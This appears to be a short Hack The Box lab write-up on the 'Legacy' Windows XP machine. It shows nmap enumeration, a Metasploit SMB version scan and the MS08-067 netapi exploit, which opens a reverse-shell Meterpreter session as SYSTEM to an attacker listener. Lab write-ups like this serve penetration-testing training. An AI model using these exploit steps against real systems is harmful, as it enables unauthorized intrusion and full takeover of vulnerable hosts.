# Metadata
IP: 10.129.159.10
Date accessed: 07/10/2021

author :Critter


# Enum

Running nmap shows port opened:

139,445,3389

Services: SMB, Windows XP

- Using SMBClient > no access 

## Metasploit

```
sf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.129.105.227:445    - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 10.129.105.227:445    -   Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB)
[*] 10.129.105.227:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


```

>running SMB version 1

Potential exploits > smb relay code execution

Look up smb windows xp sp3

```
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.159.10

```

>>>


```
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.117:4444 
[*] 10.129.159.10:445 - Automatically detecting the target...
[*] 10.129.159.10:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.159.10:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.159.10:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.159.10
[*] Meterpreter session 1 opened (10.10.14.117:4444 -> 10.129.159.10:1044) at 2021-07-12 18:34:36 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows


```